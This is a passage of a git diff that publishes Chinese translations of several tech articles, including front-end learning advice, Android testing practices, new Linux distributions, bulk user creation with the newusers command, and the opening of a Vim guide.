+### Roundcube + +[Roundcube][52] 是一个现代化、基于浏览器的邮件客户端,它提供了邮箱用户使用桌面客户端时可能用到的许多(如果不是全部)功能。它有许多特性,包括支持超过 70 种语言、集成拼写检查、拖放界面、功能丰富的通讯簿、 HTML 电子邮件撰写、多条件搜索、 PGP 加密支持、会话线索等。 Roundcube 可以作为许多用户的邮件客户端的偶尔的替代品工作。 + +在我们的 [Gmail的开源替代品][53] 综述中, Roundcube 和另外四个邮件客户端均被包含在内。 + +其以 [GPLv3][55] 许可证发布,你可以在 GitHub 上找到 Roundcube 的[源代码][54]。除了直接[下载][56]、安装该项目,你也可以在许多完整的邮箱服务器软件中找到它,如 [Groupware][57]、[iRedMail][58]、[Mail-in-a-Box][59] 和 [mailcow][60]。 + + +这就是我们的列表了。在 2016 年,你有什么喜爱的开源项目吗?喜爱的原因呢?请在下面的评论框发表。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/jen-headshot-square.jpeg?itok=GTMugLtD) + +Jen Wike Huger - Jen Wike Huger 是 Opensource.com 网站的内容管理员。她负责日期发布、协调编辑团队并指导新作者和已有作者。请在 Twitter 上关注她 @jenwike, 并在 Jen.io 上查看她的更多个人简介。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/16/12/yearbook-top-10-open-source-projects + +作者:[Jen Wike Huger][a] +译者:[ucasFL](https://github.com/ucasFL) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jen-wike +[1]:https://www.flickr.com/photos/george_eastman_house/ +[2]:https://www.flickr.com/photos/internetarchivebookimages/14784547612/in/photolist-owsEVj-odcHUi-osAjiE-x91Jr9-obHow3-owt68v-owu56t-ouySJt-odaPbp-owajfC-ouBSeL-oeTzy4-ox1okT-odZmpW-ouXBnc-ot2Du4-ocakCh-obZ8Pp-oeTNDK-ouiMZZ-ie12mP-oeVPhH-of2dD4-obXM65-owkSzg-odBEbi-oqYadd-ouiNiK-icoz2G-ie4G4G-ocALsB-ouHTJC-wGocbd-osUxcE-oeYNdc-of1ymF-idPbwn-odoerh-oeSekw-ovaayH-otn9x3-ouoPm7-od8KVS-oduYZL-obYkk3-hXWops-ocUu6k-dTeHx6-ot6Fs5-ouXK46 +[3]:https://atom.io/ +[4]:https://opensource.com/life/16/2/culture-pluggable-open-source +[5]:https://github.com/atom/atom/blob/master/CONTRIBUTING.md +[6]:https://github.com/atom/atom +[7]:http://discuss.atom.io/ +[8]:http://atom-slack.herokuapp.com/ +[9]:https://raw.githubusercontent.com/atom/atom/master/LICENSE.md +[10]:https://github.com/atom/atom +[11]:http://www.eclipse.org/che/ +[12]:https://linux.cn/article-8018-1.html +[13]:https://www.eclipse.org/che/getting-started/cloud/ +[14]:https://www.eclipse.org/che/getting-started/download/ +[15]:https://bitnami.com/stack/eclipse-che +[16]:https://github.com/eclipse/che/ +[17]:https://github.com/eclipse/che/blob/master/LICENSE +[18]:http://www.freecadweb.org/ +[19]:https://opensource.com/alternatives/autocad +[20]:https://github.com/FreeCAD/FreeCAD/blob/master/COPYING +[21]:https://github.com/FreeCAD/FreeCAD +[22]:https://www.gnucash.org/ +[23]:https://opensource.com/life/16/1/3-open-source-personal-finance-tools-linux +[24]:https://github.com/Gnucash/ +[25]:https://github.com/Gnucash/gnucash/blob/master/LICENSE +[26]:https://kmymoney.org/ +[27]:https://kodi.tv/ +[28]:https://opensource.com/life/16/1/how-set-linux-based-music-server-home +[29]:https://opensource.com/life/16/6/tinymediamanager-catalogs-your-movie-and-tv-files +[30]:https://opensource.com/life/15/11/favorite-open-source-video-player +[31]:https://opensource.com/how-submit-article +[32]:https://github.com/xbmc/xbmc +[33]:https://github.com/xbmc/xbmc/blob/master/LICENSE.GPL +[34]:https://community.mycollab.com/ +[35]:https://opensource.com/business/16/3/top-project-management-tools-2016 +[36]:https://github.com/MyCollab/mycollab +[37]:https://community.mycollab.com/docs/developing-mycollab/how-can-i-contribute-to-mycollab/ +[38]:https://github.com/MyCollab/mycollab +[39]:https://openaps.org/ +[40]:https://openaps.org/reference-design +[41]:https://github.com/openaps/openaps +[42]:https://github.com/openaps/oref0/ +[43]:http://www.openhab.org/ +[44]:https://opensource.com/life/16/4/automating-your-home-openhab +[45]:http://www.openhab.org/features/supported-technologies.html +[46]:https://github.com/openhab/openhab +[47]:https://opentoonz.github.io/e/index.html +[48]:https://opensource.com/life/16/3/weekly-news-march-26 +[49]:https://github.com/opentoonz/plugin_sdk +[50]:https://github.com/opentoonz/opentoonz/issues +[51]:https://github.com/opentoonz/opentoonz +[52]:https://roundcube.net/ +[53]:https://opensource.com/alternatives/gmail +[54]:https://github.com/roundcube/roundcubemail +[55]:https://github.com/roundcube/roundcubemail/blob/master/LICENSE +[56]:https://roundcube.net/download/ +[57]:http://kolab.org/ +[58]:http://www.iredmail.org/ +[59]:https://mailinabox.email/ +[60]:https://mailcow.email/ diff --git a/translated/talk/20161227 2017 is the year that front-end developers should go back and master the basics.md b/published/20161227 2017 is the year that front-end developers should go back and master the basics.md similarity index 59% rename from translated/talk/20161227 2017 is the year that front-end developers should go back and master the basics.md rename to published/20161227 2017 is the year that front-end developers should go back and master the basics.md index c1ffa1349e..598545caef 100644 --- a/translated/talk/20161227 2017 is the year that front-end developers should go back and master the basics.md +++ b/published/20161227 2017 is the year that front-end developers should go back and master the basics.md @@ -1,87 +1,87 @@ -2017年:前端开发者都应该回顾并掌握的基础 +前端开发者,2017 年你应该学习什么 ====================== - ![](https://cdn-images-1.medium.com/max/1000/1*1Xsnx4_M8uJc2klBxEtGLQ.jpeg) +![](https://cdn-images-1.medium.com/max/1000/1*1Xsnx4_M8uJc2klBxEtGLQ.jpeg) -在当今的快节奏生态中,我们都倾向于将时间花在尝试那些最新的创意软件中,然后在网络进行激烈的辩论。 +在当今的快节奏生态中,我们都倾向于花时间尝试最新的发明,然后在网络上进行激烈的辩论。 -这里,我并不是说我们不能这样做。但我们的确应该把脚步放慢一些,并认真了解那些变化不太大的事情。这样不仅会提高工作质量和我们创造的价值 —— 这还讲循序渐进的帮助我们更快理解这些行的工具。 +这里,我并不是说我们不能这样做。但我们的确应该把脚步放慢一些,并认真了解那些不会有很大变化的事情。这样不仅会提升我们的工作质量和我们所创造的价值 —— 还将切实地帮助我们更快理解这些新的工具。 -本文融合了我的个人经历以及对新一年的希冀。正如我想热切表达自己想法一样,我也期待能在评论区看到你的建议。 +本文融合了我的个人经历以及对新一年的希冀。正如我想热切表达自己想法一样,我也期待能在下方的评论表单中看到你的建议。 -### 学习如何写出易读的代码 +### 学习如何写出可读性高的代码 -我们多数的工作并不是编写新代码,而是维护已有代码。这意味着你最终阅读代码的时间要比编写它所花费的时间要长,所以你需要为 _之后需要阅读你代码的程序员_ 精简代码,而非让代码区适应解释器。 +我们多数的工作并不是编写新代码,而是维护已有代码。这意味着你最终阅读代码的时间要比编写它所花费的时间要长,所以你需要为_之后需要阅读你代码的程序员_优化代码,而不是为了解释器。 -这里我推荐你按以下顺序 — 由浅入深 — 阅读下面三本书: +这里我建议你按以下顺序 — 由浅入深 — 阅读下面三本书: * Dustin Boswell 的 《[编写可读代码的艺术 (The Art of Readable Code)][1]》 * Robert C. Martin 的 《[代码整洁之道 (Clean Code: A Handbook of Agile Software Craftsmanship)][2]》 * Steve McConnell 的 《[代码大全 (Code Complete: A Practical Handbook of Software Construction)][3]》 - ![](https://cdn-images-1.medium.com/max/1000/1*YQGwR6skf705fovSLCbmXQ.jpeg) +![](https://cdn-images-1.medium.com/max/1000/1*YQGwR6skf705fovSLCbmXQ.jpeg) ### 深入学习 JavaScript -现如今,每周都会出现一个新的 JavaScript 框架,并标榜自己比其他的任何旧框架都要好用。这样的情况下,我们很多人更倾向于花费时间来学习框架,而且这样也要比学习 JavaScript 本身要容易的多。如果说你正在使用框架,但并不了解该框架的工作方式,_立刻停止,并学习 JavaScript,直到你能够理解这些工具的工作方式为止_ 。 +现如今,每周都会出现一个新的 JavaScript 框架,并标榜自己比其他的任何旧框架都要好用。这样的情况下,我们很多人更倾向于花费时间来学习框架,而且这样也要比学习 JavaScript 本身要容易的多。如果说你正在使用框架,但并不了解该框架的工作方式,_立刻停止使用它,并去学习 JavaScript,直到你能够理解这些工具的工作方式为止_ 。 -* 可以从 [Kyle Simpson][4] 的 [你所不知道的 JavaScript][5] 系列开始,这个可以在线免费阅读。 -* [Eric Elliott][6] 列出的 [2017 年:JavaScript 的学习目标][7]. -* [Henrique Alves][8] 列出的 [进行响应式开发之前必须了解的事情][9](实际上就是一个知识框架)。 +* 可以从 [Kyle Simpson][4] 的 [你所不知道的 JavaScript][5] 系列开始,这个系列可以在线免费阅读。 +* [Eric Elliott][6] 列出的一个长长的 [2017 年:JavaScript 的学习目标][7]。 +* [Henrique Alves][8] 列出的 [进行响应式开发之前必须了解的事情][9](实际上就是一个知识框架)。 * Mike Pennisi 的 [JavaScript 开发者:注意你的语言][10] — 了解 ECMAScript 新特性的中 TC-39 发展过程。 ### 学习函数式编程 -多年以来,我们一直期待着 JavaScript 引入类,但真正有类之后,我们却不想在 JavaScript 中使用类了,我们只想使用函数。即使是编写 HTML,我们也是使用函数 (JSX)。 +多年以来,我们一直期待着 JavaScript 引入类,但真正引入类之后,我们却不想在 JavaScript 中使用类了,我们只想使用函数。我们甚至使用函数编写 HTML (JSX)。 * Kyle Simpson 的 [轻量级函数式 JavaScript][11]。 -* Professor Frisby 的 [函数式编程完全指南][12] 和 [在线免费课程][13]。 +* Frisby 教授的 [函数式编程完全指南][12] 和 [在线免费课程][13]。 - ![](https://cdn-images-1.medium.com/max/1000/1*Helkj3sq3oVOc-dtjRgrYQ.jpeg) +![](https://cdn-images-1.medium.com/max/1000/1*Helkj3sq3oVOc-dtjRgrYQ.jpeg) ### 学习设计基础知识 -作为一个前端开发者,我们比这个生态中的任何人 —— 可能甚至是设计人员 —— 都要更加接近用户。如果设计人员要指定你呈现在屏幕上的每一个像素,你可能会遇到各种莫名其妙的错误。 +作为一个前端开发者,我们比这个生态中的任何人 —— 甚至可能是设计人员 —— 都要更加接近用户。如果设计者必须去确认你还原在屏幕上的每一个像素,你或许做错了某些事。 -* [David Kadavy][16] 的《[黑客设计][14]》或对应的 [免费课程][15]。  +* [David Kadavy][16] 的《[黑客设计(Design for Hackers)][14]》或对应的 [免费课程][15]。  * [Tracy Osborn][18] 的讲座:[为非设计人员的设计知识][17]。 -* [Nathan Barry][20] 的 [Web 应用设计][19]。 -* [Jason Santa Maria][22] 的 [Web 页面设计][21]。 -* Alan Cooper 的 [The Inmates Are Running the Asylum: Why High Tech Products Drive Us Crazy and How to Restore the Sanity][23]。 +* [Nathan Barry][20] 的 《[Web 应用设计(Design of Web Applications)][19]》。 +* [Jason Santa Maria][22] 的 《[Web 页面设计(On Web Typography)][21]》。 +* Alan Cooper 的 《[ 交互设计之路:让高科技产品回归人性(The Inmates Are Running the Asylum: Why High Tech Products Drive Us Crazy and How to Restore the Sanity )][23]》。 * 两篇关于 UI 动画的文章:[如何使用动画来提高 UX][24]、[过渡界面][25]。 ### 学习如何与人协作 -有些人很喜欢通过编程来与电脑而非与人进行交互。不幸的是,这样的结果并不是很好。 +有些人很喜欢通过编程来与电脑进行交互,而非与人进行交互。不幸的是,这样的结果并不是很好。 -我们基本上不可能完全脱离群体来工作:我们总是需要和其他开发者、设计师以及项目经理 —— 有时候甚至要和用户 —— 交换意见。这是比较难的任务,但如果你想要真正理解你在做什么以及为什么要这么做的话,这一步是非常重要的,因为这正是我们工作的价值所在。 +基本上我们不可能完全脱离群体来工作:我们总是需要和其他开发者、设计师以及项目经理 —— 有时候甚至要和用户 —— 交换意见。这是比较难的任务,但如果你想要真正理解你在做什么以及为什么要这么做的话,这一步是非常重要的,因为这正是我们工作的价值所在。 -* [John Sonmez][27] 的《[软技能:代码之外的生存指南][26]》。 -* Robert C. Martin 的《[代码整洁之道:程序员的职业素养][28]》。 -* Jim Camp 的 《[从零开始:专业人士不想让你了解的谈判工具][29]》。 +* [John Sonmez][27] 的《[软技能:代码之外的生存指南(Soft Skills: The software developer’s life manual)][26]》。 +* Robert C. Martin 的《[代码整洁之道:程序员的职业素养(The Clean Coder: A Code of Conduct for Professional Programmers)][28]》。 +* Jim Camp 的 《[从零开始:专业人士不想让你了解的谈判工具(Start with No: The Negotiating Tools that the Pros Don’t Want You to Know)][29]》。 - ![](https://cdn-images-1.medium.com/max/1000/1*zv6BXllLujNl-vDqkXQMqw.jpeg) +![](https://cdn-images-1.medium.com/max/1000/1*zv6BXllLujNl-vDqkXQMqw.jpeg) ### 学习如何为用户编写代码 -与同事或其他人的交流大部分是以文本的形式进行的:目标描述和评论、代码注释、Git commit、即时聊天消息、电子邮件、推文、博客等。 +与同事或其他人的交流大部分是以文本的形式进行的:目标描述和评论、代码注释、Git 提交、即时聊天消息、电子邮件、推文、博客等。 -想象一下,人们要花费多少时间来理解所有以上提到的这些。你过你能够书写的更加明确和简洁,这个时间便会大大减少,然后世界将是一个更好工作的地方。 +想象一下,人们要花费多少时间来阅读和理解所有以上提到的这一切。如果你可以通过写得更清楚、简洁来减少这个时间,世界将变成一个更好的工作场所。 -* William Zinsserd 的《[On Writing Well: The Classic Guide to Writing Nonfiction][30]》。 +* William Zinsserd 的《[写作法宝 : 非虚构写作指南(On Writing Well: The Classic Guide to Writing Nonfiction)][30]》。 * William Strunk 和 E. B. White 的《[英文写作指南 (The Elements of Style)][31]》。 * [奥威尔写作规则][32]。 -* 俄国:很好的 [Glavred course][33]。 +* 俄文:很好的 [Glavred 课程][33]。 -### 学习计算机科学智慧 +### 学习以前的计算机科学智慧 -前端开发已经不仅仅简单的下拉菜单了,它比以前要复杂的多了。随着我们所需解决问题的复杂度越来越高,声名狼藉的“JavaScript 疲乏症”也随之出现了。 +前端开发已经不仅仅简单的下拉菜单了,它前所未有的更复杂了。随着我们所需解决问题的复杂度越来越高,声名狼藉的“JavaScript 疲乏症”也随之出现了。 -这意味着现在需要学习非前端开发人员近十年所积累形成的知识精华。而这也是我最想听到你向我推荐的内容了。 +这意味着现在需要学习非前端开发人员过去几十年所积累形成的知识精华。而这也是我最想听到你向我推荐的内容了。 以下是我个人给大家的推荐: -* Coursera 的 [学习想计算机科学家的思考方式][34]。 +* Coursera 的 《[学习像计算机科学家那样思考方式(Learn To Think Like A Computer Scientist )][34]》。 * [DHH][36] 的 [对我意义非凡的五本书][35]。 @@ -93,14 +93,11 @@ 作者简介: -![](https://cdn-images-1.medium.com/fit/c/60/60/0*FXw8cxdKYar82R9X.jpeg) -Web 开发者,充满激情的摄影者,疯狗的主人 (owner of crazy dogs ?)。 +Web 开发者,充满激情的摄影者,crazy dogs 的主人 译者简介: -![GHLandy](http://GHLandy.com/images/GHLandy.ico) - [GHLandy](http://GHLandy.com) —— 欲得之,则为之奋斗 (If you want it, work for it.)。 -------------------------------------------------------------------------------- @@ -109,7 +106,7 @@ via: https://medium.freecodecamp.com/what-to-learn-in-2017-if-youre-a-frontend-d 作者:[Artem Sapegin][a] 译者:[GHLandy](https://github.com/GHLandy) -校对:[校对者ID](https://github.com/校对者ID) +校对:[bestony](https://github.com/bestony) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/translated/tech/20161227 The Dos and Donts of Writing Test cases in Android.md b/published/20161227 The Dos and Donts of Writing Test cases in Android.md similarity index 76% rename from translated/tech/20161227 The Dos and Donts of Writing Test cases in Android.md rename to published/20161227 The Dos and Donts of Writing Test cases in Android.md index d6df221b5d..f11671e8a5 100644 --- a/translated/tech/20161227 The Dos and Donts of Writing Test cases in Android.md +++ b/published/20161227 The Dos and Donts of Writing Test cases in Android.md @@ -1,14 +1,14 @@ 编写 android 测试单元该做的和不该做的事 ============================================================ -在本文中, 我将根据我的实际经验,为大家阐述一个编写测试用例的最佳实践。在本文中我将使用 Espresso 编码, 但是它们可以用到单元和 instrumentation 测试当中。基于以上目的, 我们来研究一个新闻程序. +在本文中, 我将根据我的实际经验,为大家阐述一个编写测试用例的最佳实践。在本文中我将使用 Espresso 编码, 但是它们可以用到单元测试和仪器测试(instrumentation test)当中。基于以上目的,我们来研究一个新闻程序。 -> 以下内容纯属虚构,如有雷同纯属巧合:P +> 以下内容纯属虚构,如有雷同纯属巧合 :P -一个新闻 APP 应该会有以下这些 活动activities。 +一个新闻 APP 应该会有以下这些 activity。 *   语言选择 - 当用户第一次打开软件, 他必须至少选择一种语言。选择后,选项保存在共享偏好中,用户跳转到新闻列表 activity。 -*   新闻列表 - 当用户来到新闻列表 activity,将发送一个包含语言参数的请求到服务器,并将服务器返回的内容显示在 recycler view 上(包含有新闻列表的 id _news_list_)。 如果共享偏好中未存语言参数,或者服务器没有返回一个成功消息, 就会弹出一个错误对话框并且 recycler view 将不可见。如果用户只选择了一种语言,新闻列表 activity 有个 “Change your Language” 的按钮,或者如果用户选择多种语言,则按钮为 “Change your Languages” 。 ( 我对天发誓这是一个虚构的 APP 软件) +*   新闻列表 - 当用户来到新闻列表 activity,将发送一个包含语言参数的请求到服务器,并将服务器返回的内容显示在 recycler view 上(包含有新闻列表的 id, _news_list_)。 如果共享偏好中未存语言参数,或者服务器没有返回一个成功消息, 就会弹出一个错误对话框并且 recycler view 将不可见。如果用户只选择了一种语言,新闻列表 activity 有个 “Change your Language” 的按钮,或者如果用户选择多种语言,则按钮为 “Change your Languages” 。 (我对天发誓这是一个虚构的 APP 软件) *   新闻细节 - 如同名字所述, 当用户点选新闻列表项时将启动这个 activity。 这个 APP 功能已经足够,,让我们深入研究下为新闻列表 activity 编写的测试用例。 这是我第一次写的代码。 @@ -40,9 +40,9 @@ ?} ``` -#### 仔细想想测试什么。 +#### 仔细想想测试什么 -在第一个测试用例 _testClickOnAnyNewsItem()_, 如果服务器没有返回成功信息,测试用例将会返回失败,因为 recycler view 是不可见的。但是这个测试用例的目的并非如此。 **不管该用例为 PASS 还是 FAIL,它的最低要求是 recycler view 总是可见的,** 如果因某种原因,recycler view 不可见,那么测试用例不应视为 FAILED。正确的测试代码应该像下面这个样子。 +在第一个测试用例 `testClickOnAnyNewsItem()`, 如果服务器没有返回成功信息,测试用例将会返回失败,因为 recycler view 是不可见的。但是这个测试用例的目的并非如此。 **不管该用例为 PASS 还是 FAIL,它的最低要求是 recycler view 总是可见的,** 如果因某种原因,recycler view 不可见,那么测试用例不应视为 FAILED。正确的测试代码应该像下面这个样子。 ``` /* @@ -74,15 +74,13 @@ ``` #### 一个测试用例本身应该是完整的 -当我开始测试, 我通常按如下顺序测试 activities: - -* 语音选择 +当我开始测试, 我通常按如下顺序测试 activity: +* 语言选择 * 新闻列表 - *   新闻细节 -因为我首先测试语音选择 activity,在测试 NewsList activity 之前,总有一种语音已经是选择好了的。但是当我先测试新闻列表 activity 时,测试用例开始返回错误信息。原因很简单 - 没有选择语言,recycler view 不会显示。**注意, 测试用例的执行顺序不能影响测试结果。** 因此在运行测试用例之前, 语言选项必须是保存在共享偏好中的。在本例中,测试用例独立于语言选择 activity 的测试。 +因为我首先测试语言选择 activity,在测试 NewsList activity 之前,总有一种语言已经是选择好了的。但是当我先测试新闻列表 activity 时,测试用例开始返回错误信息。原因很简单 - 没有选择语言,recycler view 不会显示。**注意, 测试用例的执行顺序不能影响测试结果。** 因此在运行测试用例之前, 语言选项必须是保存在共享偏好中的。在本例中,测试用例独立于语言选择 activity 的测试。 ``` @Rule @@ -111,9 +109,9 @@ intended(hasComponent(NewsDetailsActivity.class.getName())); ?} ``` -#### 在测试用例中避免使用条件代码。 +#### 在测试用例中避免使用条件代码 -现在在第二个测试用例 _testChangeLanguageFeature()_中,我们获取到用户选择语言的个数, 基于这个数目,我们写了 if-else 条件来进行测试。 但是 if-else 条件应该写在你的代码当中,而不是测试代码里。每一个条件应该单独测试。 因此, 在本例中, 不是只写一条测试用例,而是要写如下两个测试用例。 +现在在第二个测试用例 `testChangeLanguageFeature()` 中,我们获取到用户选择语言的个数,基于这个数目,我们写了 if-else 条件来进行测试。 但是 if-else 条件应该写在你的代码当中,而不是测试代码里。每一个条件应该单独测试。 因此,在本例中,不是只写一条测试用例,而是要写如下两个测试用例。 ``` /** @@ -145,14 +143,13 @@ 在大多数应用中,我们与外部网络或者数据库进行交互。一个测试用例运行时可以向服务器发送一个请求,并获取成功或失败的返回信息。但是不能因从服务器获取到失败信息,就认为测试用例没有通过。这样想这个问题 - 如果测试用例失败,然后我们修改客户端代码,以便测试用例通过。 但是在本例中, 我们要在客户端进行任何更改吗?- **NO**。 -但是你应该也无法完全避免要测试网络请求和响应。由于服务器是一个外部代理,我们可以设想一个场景,发送一些可能导致程序崩溃的错误响应。因此, 你写的测试用例应该覆盖所有可能来自服务器的响应,甚至包括服务器决不会发出的响应。这样可以覆盖所有代码,并能保证应用可以处理所有响应,而不会崩溃。 - +但是你应该也无法完全避免要测试网络请求和响应。由于服务器是一个外部代理,我们可以设想一个场景,发送一些可能导致程序崩溃的错误响应。因此,你写的测试用例应该覆盖所有可能来自服务器的响应,甚至包括服务器决不会发出的响应。这样可以覆盖所有代码,并能保证应用可以处理所有响应,而不会崩溃。 > 正确的编写测试用例与编写这些测试代码同等重要。 感谢你阅读此文章。希望对测试用例写的更好有所帮助。你可以在 [LinkedIn][1] 上联系我。还可以[在这里][2]阅读我的其他文章。 -获取更多资讯请关注_[Mindorks][3]_, 我们发新文章时您将获得通知。 +获取更多资讯请关注我们, 我们发新文章时您将获得通知。 -------------------------------------------------------------------------------- diff --git a/translated/tech/20161229 5 Most Promising New Linux Distributions to Look Forward in 2017.md b/published/20161229 5 Most Promising New Linux Distributions to Look Forward in 2017.md similarity index 86% rename from translated/tech/20161229 5 Most Promising New Linux Distributions to Look Forward in 2017.md rename to published/20161229 5 Most Promising New Linux Distributions to Look Forward in 2017.md index dd9dede486..3708d4ce1e 100644 --- a/translated/tech/20161229 5 Most Promising New Linux Distributions to Look Forward in 2017.md +++ b/published/20161229 5 Most Promising New Linux Distributions to Look Forward in 2017.md @@ -3,7 +3,7 @@ 如果你经常光顾 [Distrowatch][1] 网站,你会发现每一年的 Linux 系统流行度排行榜几乎都没啥变化。 -排在前十名的一直都是那几个发行版,其它一些发行版也许现在还在排行榜中,到下一年年底就有可能不在了。 +排在前十名的一直都是那几个发行版,而其它一些发行版也许现在还在排行榜中,到下一年年底就有可能不在了。 关于 Distrowatch 的一个大家很不了解的功能叫做[候选列表][2],它包括以下类型的发行版: @@ -12,15 +12,15 @@ - 相关的英文资料不够丰富 - 该项目好像都没人进行维护 -其它一些非常具有潜力,但是还未被评审的 Linux 系统发行版也是值得大家去关注的。注意,由于 Distrowatch 网站暂时没时间或人力去评审这些新的发行版,因此它们可能永远无法进入网站首页排名。 +一些非常具有潜力,但是还未被评审的 Linux 系统发行版也是值得大家去关注的。但是注意,由于 Distrowatch 网站暂时没时间或人力去评审这些新的发行版,因此它们可能永远无法进入网站首页排名。 因此,我们将会跟大家分享下 **2017** 年最具潜力的 **5** 个新的 Linux 发行版系统,并且会对它们做一些简单的介绍。 由于 Linux 系统的生态圈都非常活跃,你可以期待着这篇文章后续的不断更新,或许在下一年中它将完全大变样了。 -尽管如此,咱们还是来看下这些新系统吧! +不管怎么说,咱们还是来看下这些新系统吧! -### 1\. SemicodeOS 操作系统 +### 1、 SemicodeOS 操作系统 [SemicodeOS 操作系统][3] 是一个专为程序员和 Web 开发人员设计的 Linux 发行版。它包括所有的开箱即用的代码编译器,[各种文本编辑器][4],[最流行的编程语言的 IDE 环境][5],以及团队协作编程工具。 @@ -34,7 +34,7 @@ *Semicode Linux 操作系统* -### 2\. EnchantmentOS 操作系统 +### 2、 EnchantmentOS 操作系统 [EnchantmentOS][7] 操作系统是一个基于 Xubuntu 16.04 的发行版,它包括一些经过特别挑选的对内存要求较低的应用程序。这无论对新老设备来说都是一个不错的选择。 @@ -48,9 +48,9 @@ *EnchantmentOS 操作系统* -### 3\. Escuelas Linux 操作系统 +### 3、 Escuelas Linux 操作系统 -[Escuelas Linux 操作系统][9](在西班牙语中是 ”Linux 学校“ 的意思)是一个基于 Bodhi 的 Linux 发行版,它主要是为中小学教育而设计的,它包括各种各样的与教育相关的应用软件。请忽略其西班牙语名字,它也提供全英语支持。 +[Escuelas Linux 操作系统][9](在西班牙语中是 “Linux 学校” 的意思)是一个基于 Bodhi 的 Linux 发行版,它主要是为中小学教育而设计的,它包括各种各样的与教育相关的应用软件。请忽略其西班牙语名字,它也提供全英语支持。 Escuelas Linux 系统其它方面的特性就是它使用的是轻量级桌面环境,低内存和低存储空间要求。其官网宣称,该系统只需要 300 MB 的内存和 20 GB 的硬盘存储空间就可以完美运行。 @@ -60,11 +60,11 @@ Escuelas Linux 系统其它方面的特性就是它使用的是轻量级桌面 *Escuelas Linux 操作系统* -### 4\. OviOS 操作系统 +### 4、 OviOS 操作系统 与前面几个 Linux 发行版截然不同的是,[OviOS 操作系统][11] 并不是一个多用途的操作系统。相反,它被描述为企业级存储操作系统,虽然它不基于任何发行版,但是完全与 Linux 标准库(LSB)相兼容。 -你可以把 OviOS 系统作为一种功能强大的存储设备,它能够处理 iSCSI,NFS,SMB 或者是 FTP 服务,除此之外,最新版的 OviOs 系统还能实现复制及高可用性。因此,你还在等什么呢?赶紧去试用一下吧。 +你可以把 OviOS 系统作为一种功能强大的存储设备,它能够处理 iSCSI、NFS、SMB 或者是 FTP 服务,除此之外,最新版的 OviOS 系统还能实现复制及高可用性。因此,你还在等什么呢?赶紧去试用一下吧。 [ ![OviOS](http://www.tecmint.com/wp-content/uploads/2016/12/ovios.png) @@ -72,9 +72,9 @@ Escuelas Linux 系统其它方面的特性就是它使用的是轻量级桌面 *OviOS 操作系统* -### 5\. 开放式网络 Linux 操作系统Open Network Linux +### 5、 Open Network Linux -[ONL][13] 操作系统(简称)是一个基于 Debian 的发行版,而且(就像 OviOs 操作系统一样),它也不是一个多用途的操作系统。 +[ONL][13] 操作系统(简称)是一个基于 Debian 的发行版,而且(就像 OviOS 操作系统一样),它也不是一个多用途的操作系统。 如果你是一名网络管理员,你应该为找到这个操作系统而感到庆幸(如果你之前不知道的话),你可以把 ONL 系统应用于裸交换机设备上,替换原有的昂贵且需要授权的操作系统。 diff --git a/published/20161230 Simple way for unattended bulk user creation in Linux.md b/published/20161230 Simple way for unattended bulk user creation in Linux.md new file mode 100644 index 0000000000..2607bc4b06 --- /dev/null +++ b/published/20161230 Simple way for unattended bulk user creation in Linux.md @@ -0,0 +1,72 @@ +在 Linux 中无人看守批量创建用户的方法 +============= + +### 介绍 + +作为一名 Linux 系统管理员,你有时必须向系统添加新的用户帐户。为此,经常使用 `adduser` 命令。当涉及到多个用户的创建时,`adduser` 命令可能会变得相当无聊和耗时。这篇短文旨在为 Linux 系统管理员提供一种简单而无人值守的方式来批量创建用户。`newusers` 命令将帮助你通过从预填文件中获取信息来创建多个用户。 + +**要求** + +访问 Linux 计算机的特权。 + +**约定** + +- `#` - 给定命令需要以 root 用户权限运行或者使用 `sudo` 命令 +- `$` - 给定命令以常规权限用户运行 + +### 如何进行 + +**创建一个包含用户名的文件** + +首先,你需要创建一个包含用户名列表的文件。 + +``` +$ vi users-list.txt +``` + +在文件中,一个用户一行,下面是样式: + +``` +Username:Password:User ID:Group ID:User Info:Home Directory:Default Shell +Username:Password:User ID:Group ID:User Info:Home Directory:Default Shell +Username:Password:User ID:Group ID:User Info:Home Directory:Default Shell +... +``` + +**创建用户** + +在创建了包含用户信息的文件后,使用 `newusers` 命令创建用户。 + +``` +# newusers users-list.txt +``` + +**检查用户账户** + +最后你可以确认用户已经正确创建了,在 `/etc/passwd` 文件中查看它们: + +``` +# tail /etc/passwd +``` + +![using newusers for bulk user creation](https://linuxconfig.org/images/newusers-bulk-user-creation.png) + + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux + +作者:[Essodjolo Kahanam][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux +[1]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux#h4-1-create-a-file-containing-the-usernames +[2]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux#h4-2-create-users +[3]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux#h4-3-check-user-accounts +[4]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux#h1-introduction +[5]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux#h2-requirements +[6]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux#h3-conventions +[7]:https://linuxconfig.org/simple-way-for-unattended-bulk-user-creation-in-linux#h4-how-to-proceed diff --git a/published/201701/20120301 The Beginner’s Guide to Start Using Vim - part 1.md b/published/201701/20120301 The Beginner’s Guide to Start Using Vim - part 1.md new file mode 100644 index 0000000000..07eda5aaa7 --- /dev/null +++ b/published/201701/20120301 The Beginner’s Guide to Start Using Vim - part 1.md @@ -0,0 +1,126 @@ +Vim 初学者入门指南 +============================================================ +![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/03/vim-beginner-guide-featured.jpg "Vim 初学者入门指南") + + +这篇文章是 [VIM 用户指南][12] 系列文章中的一篇: + +* Vim 初学者入门指南 +* [Vim 快捷键速查表][3] +* [5 个针对有经验用户的 Vim 技巧][4] +* [3 个针对高级用户的 Vim 